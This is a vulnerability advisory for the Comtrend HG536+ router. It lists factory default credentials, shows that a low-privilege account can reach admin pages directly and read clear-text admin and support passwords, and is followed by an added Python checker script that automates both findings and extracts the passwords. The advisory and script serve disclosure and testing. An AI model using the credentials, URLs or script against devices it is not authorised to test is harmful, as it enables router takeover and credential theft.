##########################################
Comtrend HG536+ vulnerabilities
Vendor URL: www.comtrend.com
Advisory URL: http://lostmon.blogspot.com/2009/04/comtrend-hg536-vulnerabilities.html
Vendor notified: NO
#########################################

#####################
Description by vendor
#####################

The HG536+ is an 802.11g (54Mbps) wireless and wired Local Area Network
(WLAN) ADSL router. Four 10/100 Base-T Ethernet ports provide wired LAN
connectivity with an integrated 802.11g WiFi WLAN Access Point for
wireless connectivity.

################
Vulnerabilities
################

This device ships with the following default settings:
==========================================
- LAN port IP address: 192.168.1.1
- Local administrator account name: admin
- Local administrator account password: admin
- Local non-administrator account name: user
- Local non-administrator account password: user
- Remote WAN access: disabled
- Remote WAN access account name: support
- Remote WAN access account password: support
- NAT: enabled; firewall: disabled
- DHCP server on LAN interface: enabled
- WAN IP address: none
============================================

All of these flaws exist because access control is enforced only by
ineffective client-side JavaScript in the 'menuBcm.js' file, which shows
or hides items in menu.html according to which user is logged in. The
restriction is not enforced on the server side, so a minimal user can
request every page of the web interface directly, bypassing these
"pseudo restrictions". Exploiting all of the flaws requires only the
credentials of a minimal (non-administrator) account.

Vuln 1 => Access control error

A non-administrator user logs in with username "user" and password
"user". This account is apparently "restricted": it can only update the
firmware, manage SNMP, view some router status, and run ADSL
connectivity diagnostics.
In this firmware version the router has an access control error: a user
without privileges (user/user) can reach every function by requesting
the relevant page or command directly. For example, this user has no
menu entry for the router setup, but by requesting
http://192.168.1.1/wancfg.cmd he can configure the WAN settings.

Download the configuration => http://192.168.1.1/backupsettings.html
View the wireless key => http://192.168.1.1/wlsecurity.html

Vuln 2 => Clear-text admin password disclosure

Log in to the router with the user/user account, open
http://192.168.1.1/password.html and view the page source. In the source
we find:
=======================
pwdAdmin = 'admin';
pwdSupport = 'support';
pwdUser = 'user';
=======================
The page embeds the passwords of the admin, support and user accounts in
clear text, so anyone holding the non-administrator account can read the
administrator and remote support passwords.

###############
Versions
###############

Comtrend HG536+ firmware A101-302JAZ-C03_R14.A2pB021g.d15h

##############
Solution
#############

No solution was available at this time. By default this router denies
access from WAN connections, but this style of attack can still be
carried out by any user inside the LAN, or from the Internet if WAN
access is enabled. Keep WAN access disabled and grant access to the
device only to trusted users.

#################
€nd
#############

--
Regards:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....
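The following script is an added example for checking a device against both findings above (Vuln 1, restricted pages reachable with the user/user account, and Vuln 2, clear-text passwords in the source of password.html). It is not part of Lostmon's advisory or of any Comtrend code. It assumes the web interface authenticates with HTTP Basic authentication (the advisory does not state the scheme), that the four page paths quoted in the advisory exist, and that the passwords appear in the `pwdAdmin = 'value';` form quoted above. The HTTP layer is injectable, and the constructed responses at the bottom model a vulnerable device and a fixed one so the logic runs offline.

```python
"""Probe a Comtrend HG536+ style web UI for the two advisory findings.

Added example, not code from the advisory or the vendor. Assumptions:
HTTP Basic auth on the web UI, the page paths quoted in the advisory,
and credentials embedded as  pwdName = 'value';  in password.html.
"""
import base64
import re
import urllib.error
import urllib.request

# Pages the advisory says a "user"-level account should not be able to reach.
RESTRICTED_PAGES = (
    "/wancfg.cmd",           # WAN configuration
    "/backupsettings.html",  # download of the whole configuration
    "/wlsecurity.html",      # wireless key
    "/password.html",        # source embeds clear-text passwords (Vuln 2)
)

# Matches the form quoted in the advisory:  pwdAdmin = 'admin';
PWD_RE = re.compile(r"(pwd(?:Admin|Support|User))\s*=\s*'([^']*)'")


def extract_passwords(html):
    """Return {'pwdAdmin': ..., 'pwdSupport': ..., 'pwdUser': ...} found in page source."""
    return {name: value for name, value in PWD_RE.findall(html)}


def basic_auth_header(username, password):
    """Build the Authorization header value (Basic auth is an assumption)."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return "Basic " + token


def fetch(base_url, path, username, password, timeout=5):
    """GET base_url+path with Basic auth; return (status, body)."""
    req = urllib.request.Request(base_url.rstrip("/") + path)
    req.add_header("Authorization", basic_auth_header(username, password))
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("latin-1", "replace")
    except urllib.error.HTTPError as e:
        return e.code, ""


def check_router(base_url, username="user", password="user", fetch_fn=fetch):
    """Request each restricted page with the low-privilege account.

    A 200 response means the page was served despite the account's role
    (Vuln 1). For password.html the body is also parsed for clear-text
    credentials (Vuln 2). Returns {"reachable": [...], "passwords": {...}}.
    """
    report = {"reachable": [], "passwords": {}}
    for path in RESTRICTED_PAGES:
        status, body = fetch_fn(base_url, path, username, password)
        if status == 200:
            report["reachable"].append(path)
            if path == "/password.html":
                report["passwords"] = extract_passwords(body)
    return report


# Constructed sample modelled on the password.html source quoted in the advisory.
SAMPLE_PASSWORD_HTML = """<html><head><script language="javascript">
pwdAdmin = 'admin';
pwdSupport = 'support';
pwdUser = 'user';
</script></head><body></body></html>"""


def fake_fetch_vulnerable(base_url, path, username, password):
    """Constructed responses: every page served regardless of role."""
    if path == "/password.html":
        return 200, SAMPLE_PASSWORD_HTML
    return 200, "<html><body>page body</body></html>"


def fake_fetch_fixed(base_url, path, username, password):
    """Constructed responses: server rejects the low-privilege account."""
    return 401, ""


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:   # e.g. python check_hg536.py http://192.168.1.1
        report = check_router(sys.argv[1])
    else:                   # offline demonstration against the constructed device
        report = check_router("http://192.168.1.1", fetch_fn=fake_fetch_vulnerable)
    for page in report["reachable"]:
        print("reachable with user/user:", page)
    for name, value in report["passwords"].items():
        print("clear-text credential:", name, "=", repr(value))
```

Run it with the router's base URL as the only argument; with no argument it runs against the constructed vulnerable device. Treat any entry in `reachable` as a confirmed role bypass only after checking that the served body is the real page and not a login form, since the advisory does not describe what a rejected request looks like on this firmware.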